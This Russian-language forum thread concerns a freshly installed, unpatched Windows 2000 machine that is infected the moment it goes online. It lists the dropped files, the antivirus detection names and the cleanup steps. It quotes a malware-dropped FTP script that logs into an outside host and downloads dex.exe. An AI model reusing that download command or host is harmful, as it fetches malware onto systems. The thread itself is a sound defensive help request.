Заражается свежеустановленная ОС

[Makc-81]

Ситуация такая.
Отключаю компьютер от сети, путем выдергивания шнура. Устанавливаю Windows 2000 на нулевый компьютер, форматирую все диски, перезагружаю компьютер, вирусов не обнаружено. Дистрибутив винды проверен на вирусы, ОС неоднократно ставилась с этого дистрибутива на разные компьютеры с последующим обновлением через интернет, пробовал другой дистрибутив со встроенным sp4. Устанавливаю servise pack 4. С целью обезопасить компьютер ставлю kis7.0.1.325ru, ставлю последнее обновление для него. После подключения к сети страница автоматического обновления http://www.update.microsoft.com открывается с ошибкой, код ошибки : 0x800с0002.
Если отключить касперского или не обновить его после подключения к сети ловлю вирус, не заходя в интернет ничего не делая, сразу вирус как только втыкаю провод. До этого момента каспер молчит, иногда при отключении сетевого фильтра запрашивается процесс для подключения к интернет lcacc.exe.
Подключен к провайдеру onlime.ru, провайдер говорит, что на их серверах установлены антивирусы и фаерволы. Если провайдер говорит правду, создается впечатление, что заражен сайт микроглюка.
Если нет защиты после подключения провода сразу цепляю вирус описанный в этой статье форума: http://virusinfo.info/archive/index.php/t-65256.html

Появляются файлы, которые в дальнейшем антивирус опознает как вирусы:
C:\WINNT\system32\lcacc.exe
C:\RECYCLER\S-1-5-21-1749832481-1896667295-774044582-2440\wmfcgr.exe
C:\RECYCLER\S-1-5-21-9953038916-4790255162-672681544-0077\sysdrv.exe
C:\RECYCLER\S-1-5-21-9367907129-1102793359-680670111-1582\msdrive.exe
C:\WINNT\dex.exe
c:\WINNT\system32\yygdcgez.exe
E:\WINNT\Temp\tmp??.tmp

Также в каталоге C:\WINNT\system32 появляются файлы "двухзначное число".exe? где "двухзначное число" - две любые цифры 13, 16, 18, 37, 43, 61.exe и так далее, думаю они случайны. Что антивирусом также определяется как вирус.
Касперский идентифицирует вирус по разному: Type_Win32; Trojan-Spy.Win32.Zbot.gen, последнее обновление все вирусы определяло как P2P-Worm.Win32.Palevo.npl


При использовании флешки, она на зараженном компе заражается вирусом Worm.Win32.AutoRun.dui
H:\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\lcacc.exe
autorun.inf

В папке C:\WINNT\system32 появляется файл "i" следующего содержания:

open new2ftp.site4girl.com 21
user host 025342672
binary
get /.gem/exe/dex.exe
quit

Иногда содержимое файла меняется, но смысл почти одинаковый, подключение к FTP скачать/запустить EXEфайл.

В случае установки Windows XP тоже самое, все носители информации в компьютер вставляются чистыми, скачивание необходимого обновления для винды и каспера делается с компьютера на котором установлен последний антивирус и ОС с последними обновлениями.

Помогите пожалуйста вычислить откуда из сети берется вирус, какое обновление на Windows 2000 необходимо поставить, чтобы избежать заражения, какие порты необходимо закрыть, чтобы вирус не забрался в комп, и виноват ли в заражении провайдер, откуда вирус меня так быстро находит, где и как выяснить источник заражения? Как воспользоваться автоматическим обновлением с включенным kis7.0.1.325ru, и не подхватить вирус?

Спасибо большое, ушел вновь ставить ОС.

[pig]

После SP4 надо поставить Rollup1. Да и тьму вышедших позже обновлений безопасности лучше тоже поставить до подключения к интернету.

Ошибка 0x800с0002 может быть от несовместимости непатченной системы с KIS, к тому же никакий антивирус и файрвол не в состоянии закрыть дыры системы.

А почему 2K, если не секрет?

[Makc-81]

Знаю,что дыры в системе надо закрывать, хотелось автоматически чтобы винда сама это делала, каспер не даёт вторгнуться в систему вирусу, покрайней мере когда система уже загружена и загружен каспер, если провод воткнут и комп загружается вирус проникнуть может, если успеет, так же моментом заражается комп в безопасном режиме с поддержкой сети. Винда 2К ставиться на 600 пенек, ХРюшка будет тормозить сильно. Комп слабенький. Rollup1 не помагает. Уже ставил.

Добавлено через 55 минут

И так. Проблема вроде решена.
Для тех у кого возникнет такая же ситуация:
Отключаем компьютер от сети, форматируем все жесткие диски, либо если разметка FAT32, в ОС DOS)) удаляем на всех дисках, папки RECYCLER, "System Volume Information".
На системном диске:"Documents and Settings", "Program Files", WINDOWS/WINNT и все системные вайлы в корне, включая скрытые.
Это позволит сохранить накопленные годами файлы не желательные для удаления, если хранились файлы в "c:\Documents and Settings\ИмяПользователя\Мои документы" необходимо предварительно сохранить их в другое место, либо позаботиться о её не удалении.
Все компьютер от вируса очищен.

Убеждаемся, что комп не подключен к сети, устанавливаем Windows 2K/ХРюшка.
Скачиваем последний сервис пак с защищенного компа, если он не встроен в дистрибутив, устанавливаем его на нашу неподключенную к сети машину.
Скачиваем антивирус Касперского СЕДЬМОЙ или более ранней версии, так как его можно обновлять без подключения к интернет. отсюда
Скачиваем полный набор антивирусных баз. Архив содержит все антивирусные базы, вышедшие до последнего воскресенья. Обновляется раз в неделю, в воскресенье.отсюда
Скачиваем и устанавливаем Internet Explorer версии 6.
Устанавливаем и обновляем Касперского.
Загружаем компьютер и антивирус, подключаем комп к сети интернет, активируем Касперского, лезем на виндус опдейт и устанавливаем все обновления.

Все скачивания из сети интернет производятся не с того компьютера который реанимируем, а с защищенного, не подверженного вирусной атаке, с установленными обновлениями и последней версией антивируса.

В ходе обновления винды, Касперского с подключением к интернет, при любой необходимой перезагрузки ОС необходимо выдирать шнур из сетевухи. Иначе можно заразиться, и подключаться только после полной загрузки ОС и антивируса.